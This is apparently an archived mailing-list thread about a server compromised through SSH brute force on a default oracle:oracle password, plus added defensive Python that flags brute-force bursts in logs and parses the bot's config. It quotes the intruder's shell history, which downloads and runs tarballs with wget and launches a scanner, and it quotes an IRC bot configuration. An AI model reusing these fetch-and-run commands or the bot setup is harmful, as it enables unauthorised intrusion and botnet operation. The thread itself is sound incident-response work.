Re: [botnets] mech config captured today

2007-11-16 Thread bodik
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--

yes, it was an ssh bruteforce. user installed oracle client recently, and
forgot to change the password ;(( it was oracle:oracle

bodik

Adriel Desautels wrote:
> How did they get in?
> 
> Regards,
>   Adriel T. Desautels
>
>> access was gained by very very weak password, and standard procedure
>> comes, download bot, ssh cracker, spam tool ...


___
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets


Re: [botnets] mech config captured today

2007-11-16 Thread J. Oquendo
bodik wrote:

> 
> yes, it was an ssh bruteforce. user installed oracle client recently, and
> forgot to change the password ;(( it was oracle:oracle

After all this time I don't know how come stupid administrators are
given access to administrate machines. How hard can it be to block in
all (iptables, ipfw, ipf, etc) to ssh minus the ones that need access.
It boggles me.

How hard was it to find and install something easily found on the
Internet (ossec) to mitigate against this? About 1 minute

./install

Some of these compromised businesses need to start giving idiot admins
the boot. Sorry if it's off-topic, harsh, etc., but man, experience,
training, common sense sure go a long way.


J. Oquendo

SGFA (FW+VPN v4.1)
SGFE (FW+VPN v4.1)

"I hear much of people's calling out to punish the
guilty, but very few are concerned to clear the
innocent." Daniel Defoe

http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xF684C42E



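The compromise described in this thread (an SSH password-guessing run that ended with a successful login on the oracle account) leaves a recognisable trace in sshd's log: a burst of "Failed password" lines from one source, then "Accepted password" from that same source. The Python below is an added example, not part of any message in this thread and not OSSEC's rule logic; it runs that check over constructed sshd log lines (the host name, addresses, timestamps and user names are made up) and reports sources above a failure threshold together with accounts whose password login succeeded after such a burst.

```python
"""Flag SSH brute-force bursts and the success-after-failures pattern in sshd logs.

Added example, not from the thread. The log lines below are constructed to
resemble OpenSSH syslog output; host, addresses and times are invented.
"""
import re
from collections import defaultdict

# Constructed sample of /var/log/auth.log style lines (not a real capture).
SAMPLE_LOG = """\
Nov 16 03:12:01 dbhost sshd[4120]: Failed password for invalid user admin from 198.51.100.7 port 51022 ssh2
Nov 16 03:12:03 dbhost sshd[4122]: Failed password for root from 198.51.100.7 port 51030 ssh2
Nov 16 03:12:05 dbhost sshd[4124]: Failed password for invalid user test from 198.51.100.7 port 51041 ssh2
Nov 16 03:12:07 dbhost sshd[4126]: Failed password for oracle from 198.51.100.7 port 51055 ssh2
Nov 16 03:12:09 dbhost sshd[4128]: Failed password for oracle from 198.51.100.7 port 51060 ssh2
Nov 16 03:12:11 dbhost sshd[4130]: Accepted password for oracle from 198.51.100.7 port 51071 ssh2
Nov 16 08:40:12 dbhost sshd[5201]: Accepted publickey for bodik from 192.0.2.10 port 40012 ssh2
Nov 16 09:01:33 dbhost sshd[5388]: Failed password for bodik from 192.0.2.10 port 40100 ssh2
Nov 16 09:01:40 dbhost sshd[5390]: Accepted password for bodik from 192.0.2.10 port 40104 ssh2
"""

# Matches the auth result, method, target user and source address of an sshd event.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)


def parse_sshd(text):
    """Yield (result, method, user, ip) for every line that is an sshd auth event."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m.group("result"), m.group("method"), m.group("user"), m.group("ip")


def analyze(text, threshold=4):
    """Return (bruteforce_ips, compromised_accounts).

    bruteforce_ips: {ip: failure_count} for sources with at least `threshold` failures.
    compromised_accounts: [(user, ip)] where a *password* login succeeded from a
    source that had already accumulated `threshold` failures, i.e. the guessing worked.
    Key-based logins are never counted as compromises here.
    """
    failures = defaultdict(int)
    compromised = []
    for result, method, user, ip in parse_sshd(text):
        if result == "Failed":
            failures[ip] += 1
        elif method == "password" and failures[ip] >= threshold:
            compromised.append((user, ip))
    bruteforce = {ip: n for ip, n in failures.items() if n >= threshold}
    return bruteforce, compromised


if __name__ == "__main__":
    brute, owned = analyze(SAMPLE_LOG)
    for ip, n in brute.items():
        print(f"brute force: {ip} ({n} failures)")
    for user, ip in owned:
        print(f"password login succeeded after burst: {user} from {ip}")
```

On a live host, feed it the contents of /var/log/auth.log (or the sshd journal). The per-source count is the weak spot: a guessing run spread over many sources stays under the threshold unless you also aggregate failures by target account. Restricting which source addresses may reach port 22 at all, as suggested in the message above, removes most of this noise before it is logged.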


Re: [botnets] mech config captured today

2007-11-16 Thread Steven Adair

Just taking a wild stab in the dark, I'd bet on SSH brute force.  A number of 
groups on Undernet (Romanian ones especially) are known to SSH brute force 
attack boxes and then install mech and put up a bunch of clones in an IRC 
channel from the box.  Here's a nice example of the classic scenario (sometimes 
it's more automated though):

http://lists.virus.org/dshield-0407/msg00193.html

Steven

On Fri, 16 Nov 2007 12:08:49 -0500, Adriel Desautels <[EMAIL PROTECTED]> wrote:



Re: [botnets] mech config captured today

2007-11-16 Thread Adriel Desautels
How did they get in?

Regards,
Adriel T. Desautels
Chief Technology Officer
Netragard, LLC.
Office : 617-934-0269
Mobile : 617-633-3821
http://www.linkedin.com/pub/1/118/a45

---
Netragard, LLC - http://www.netragard.com  -  "We make IT Safe"
Penetration Testing, Vulnerability Assessments, Website Security


bodik wrote:
> Hi,
> 
> we've found one instance of bot from someone called Drow (tools were
> compiled but not stripped somewhere in /home/drow ... ;))). Probably a
> Spanish-speaking person.
> 
> Undernet admins should take a look down below and check their servers.
> if there are listening here ..
> 
> access was gained by very very weak password, and standard procedure
> comes, download bot, ssh cracker, spam tool ...
> 
> was a kiddie, comes from 89.123.217.233, no with no cleanup and probably
> a manual job ..
> 

Re: [botnets] mech config captured today

2007-11-16 Thread Attila-Mihaly Balazs
Hello all.

This is my first post, so excuse me if I didn't follow some of the 
etiquette and please kindly show me the right direction ;)

Anyway, I just wanted to say that this one is from our neck of the woods 
(i.e. Romania), since the IP given is from Bucharest, the capital of 
Romania. Also, a quick lookup 
(http://www.dnsstuff.com/tools/whois.ch?ip=89.123.217.233) reveals that 
the IP belongs to the Romanian Telecom provider RomTelecom. However the 
kid may be localized anywhere in the country, since RomTelecom uses the 
exit point in Bucharest for all of their ADSL lines. Also, all of the 
text in the binaries which isn't in English, is in Romanian.

Some more hints:
The binaries contain references to the Undernet channel #Linux-Team 
which is invite only as of this moment. Other people mentioned by 
nickname are: MiKuTuL (this means "the small one" in Romanian, although 
it is not written correctly), Serano, Cortez, Arni neam, Gluu, BadBoys. 
The text also contains references to "unguri satmareni", which means: 
"the Hungarians from Satu-Mare", Satu Mare being a county of Romania 
(http://www.satu-mare.ro/). If you search for "unguri satmareni", you 
will get two other complaints of servers being hacked.

Hope this was helpful. Best regards.


-- 
Attila-Mihaly BALAZS
Virus Researcher
BitDefender
--
Email: [EMAIL PROTECTED]
Phone: +40 264 443 008
--
www.bitdefender.com




[botnets] mech config captured today

2007-11-16 Thread bodik
Hi,

we've found one instance of bot from someone called Drow (tools were
compiled but not stripped somewhere in /home/drow ... ;))). Probably a
Spanish-speaking person.

Undernet admins should take a look down below and check their servers.
if there are listening here ..

access was gained by very very weak password, and standard procedure
comes, download bot, ssh cracker, spam tool ...

was a kiddie, comes from 89.123.217.233, no with no cleanup and probably
a manual job ..

 cut history 

passwd

ps x

cd /tmp

w

ps x

cd /tmp

wget freewebs.com/staycu/stayku.tar

tar xzvf stayku.tar

cd .staycu

./linux

cat /proc/cpuinfo

cd /var/tmp/delles

cd /var/tmp

wget http://www.geocities.com/demonfire_16/delles.tar.gz

tar xzvf delles.tar.gz

cd delles

./a 200.62

nohup ./start 59 >> /dev/null &

cd /var/tmp/delles

cat vuln.txt

ps x

cd /var/tmp/delles

cat vuln.txt

ps x

cd /var/tmp/delles

cat vuln.txt
...
...
 cut history 

bodik

 cut 

# Boqdan`S EnergyMech configuration file
# v2.9.3 - Boqdan

# Linking #
#ENTITYemech
#LINKPASS  abc123
#LINKPORT  49152
#LINK  hismech a1b2c3 mech.host.net 49152
#LINK  hermech abcdefg 0 0
AUTOLINK

# Server List 
SERVER diemen.nl.eu.undernet.org 6660
SERVER diemen.nl.eu.undernet.org 6667
SERVER diemen.nl.eu.undernet.org 6669
SERVER lelystad.nl.eu.undernet.org 
SERVER lelystad.nl.eu.undernet.org 6667
SERVER lelystad.nl.eu.undernet.org 6668
SERVER london2.uk.eu.undernet.org 6660
SERVER london2.uk.eu.undernet.org 6669
SERVER london2.uk.eu.undernet.org 7000
SERVER graz.at.eu.undernet.org 6660
SERVER graz.at.eu.undernet.org 6670
SERVER graz.at.eu.undernet.org 7000
SERVER helsinki.fi.eu.undernet.org 
SERVER helsinki.fi.eu.undernet.org 6669
SERVER helsinki.fi.eu.undernet.org 7000
SERVER montreal.qc.ca.undernet.org 6665
SERVER montreal.qc.ca.undernet.rog 6669
SERVER montreal.qc.ca.undernet.org 7000
SERVER oslo2.no.eu.undernet.org 6660
SERVER oslo2.no.eu.undernet.org 6669
SERVER oslo2.no.eu.undernet.org 7000



# SERVER  1.2.3.4 6667   ThisIsMyPassword
# SERVER 192.168.100.16669  moo:eu.undernet.org:6667

# Bot 1 Configuration #
NICK  Boqdan
USERFILE  1
CMDCHAR   -
LOGIN gat
IRCNAME  tundd
MODES +ix-ws
#VIRTUAL
#NOSEEN

HASONOTICE  1   # Yes for Undernet.
TOG CC  1   # We want the bot to require command character
TOG CLOAK   1   # Ignore CTCP's from non-users? Yes.
TOG SPY 1   # Tell who is executing what in the partyline.
SET OPMODES 6   # How many modes in a line? 6 on undernet...
SET BANMODES6   # How many bans in a line? 6 on undernet...
SET CTIMEOUT60  # Server connection timeout
SET CDELAY  30  # Delay between connection attempts

CHANNEL #staycu.com # Channel name
TOG PUB 1   # Allow public(in-channel) commands? Yes.
TOG MASS1   # Do mass-mode/kick/ban checks...
TOG SHIT1   # Activate the shitlist for this channel
TOG PROT1   # Activate protection of users
TOG ENFM0   # Dont enforce channel modes.
SET MDL 5   # How many -o before killing the guy?
SET MKL 5   # How many kicks?
SET MBL 5   # And how many Bans?
SET MPL 1   # What to do with massmoders?
#   0 = nothing,
#   1 = kick the bastard,
#   2 = kickban 'em,
#   3 = kickban & shitlist them.
# END BOT 1 #

# Bot 2 Configuration #

NICK  Guapo
USERFILE  1
CMDCHAR   -
LOGIN lmess
IRCNAME   mesaju
MODES +ix-ws
#VIRtual
#NOSEEN

HASONOTICE  1   # Yes for Undernet.
TOG CC  1   # We want the bot to require command character
TOG CLOAK   1   # Ignore CTCP's from non-users? Yes.
TOG SPY 1   # Tell who is executing what in the partyline.
SET OPMODES 6   # How many modes in a line? 6 on undernet...
SET BANMODES6   # How many bans in a line? 6 on undernet...
SET CTIMEOUT60  # Server connection timeout
SET CDELAY  30  # Delay between connection attempts

CHANNEL #staycu.com # Channel name
TOG PUB 1   # Allow public(in-channel) commands? Yes.
TOG MASS1   # Do mass-mode/kick/ban checks...
TOG SHIT1   # Activate the shitlist for this channel
TOG PROT1   # Activate protection of users
TOG ENFM0   # Dont enforce channel modes.
SET MDL 5   # How many -o before killing the guy?
SET MKL 5   # How many kicks?
SET MBL 5   # And how many Bans?
SET MPL 1   # What to do with massmoders?
#   0 = nothing,
#   1 = kick the bastard,
#   2 = kickban 'em,
#   3 = kic
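For the Undernet admins asked above to check their servers, the actionable part of the captured configuration is the list of SERVER host/port pairs, the bot NICKs and the CHANNEL. The Python below is an added example, not from the thread or from the EnergyMech project: it parses a constructed, abridged copy of the config quoted above (same keyword-per-line shape, fewer lines). Three details of the format matter for a parser: CHANNEL's argument itself starts with "#", so a naive comment stripper would delete it; a SERVER line may lack a port (treated here as IRC's conventional 6667, an assumption about the bot's default); and a host outside the expected domain, like the mis-typed undernet.rog entry in the capture, is worth listing separately because the bot can never reach it.

```python
"""Pull IRC rendezvous indicators out of an EnergyMech-style bot config.

Added example, not from the thread or the EnergyMech project.
"""

# Constructed abridgement of the config quoted in the post above: same
# keyword-per-line shape, fewer lines; the mis-typed 'undernet.rog' host
# from the capture is kept on purpose.
SAMPLE_CONFIG = """\
# Boqdan`S EnergyMech configuration file
#LINKPASS  abc123
AUTOLINK
SERVER diemen.nl.eu.undernet.org 6667
SERVER lelystad.nl.eu.undernet.org 
SERVER montreal.qc.ca.undernet.rog 6669
SERVER oslo2.no.eu.undernet.org 7000
# SERVER  1.2.3.4 6667   ThisIsMyPassword
NICK  Boqdan
CHANNEL #staycu.com # Channel name
TOG PUB 1   # Allow public(in-channel) commands? Yes.
NICK  Guapo
CHANNEL #staycu.com # Channel name
"""

DEFAULT_IRC_PORT = 6667  # assumption used for SERVER lines that carry no port


def tokens(line):
    """Split a config line into tokens, dropping a trailing '# comment'.

    CHANNEL's first argument is itself '#name', so it is kept; any later
    token that starts with '#' begins a comment and ends the line.
    """
    parts = line.split()
    out = []
    for i, tok in enumerate(parts):
        is_channel_name = i == 1 and parts[0].upper() == "CHANNEL"
        if tok.startswith("#") and not is_channel_name:
            break
        out.append(tok)
    return out


def parse_mech_config(text, expected_suffix=".undernet.org"):
    """Return servers [(host, port)], nicks, channels (deduplicated, in order)
    and odd_hosts: servers outside expected_suffix, which usually means a typo."""
    servers, nicks, channels, odd_hosts = [], [], [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank, or fully commented out ('#LINKPASS', '# SERVER ...')
        toks = tokens(line)
        if not toks:
            continue
        key, args = toks[0].upper(), toks[1:]
        if key == "SERVER" and args:
            host = args[0].lower()
            has_port = len(args) > 1 and args[1].isdigit()
            port = int(args[1]) if has_port else DEFAULT_IRC_PORT
            servers.append((host, port))
            if not host.endswith(expected_suffix):
                odd_hosts.append(host)
        elif key == "NICK" and args:
            nicks.append(args[0])
        elif key == "CHANNEL" and args and args[0] not in channels:
            channels.append(args[0])
    return {"servers": servers, "nicks": nicks, "channels": channels, "odd_hosts": odd_hosts}


def report(cfg):
    """Render the indicators as one line each, for an IRC operator to act on."""
    lines = [f"channel {c}" for c in cfg["channels"]]
    lines += [f"nick {n}" for n in cfg["nicks"]]
    lines += [f"server {h}:{p}" for h, p in cfg["servers"]]
    lines += [f"odd host (outside expected domain) {h}" for h in cfg["odd_hosts"]]
    return lines


if __name__ == "__main__":
    print("\n".join(report(parse_mech_config(SAMPLE_CONFIG))))
```

Run it against the full config from the post by reading the file instead of SAMPLE_CONFIG; the nick and channel pairs tell an operator what to look for on each listed server, and the server list itself is what a network-level block or sinkhole would need.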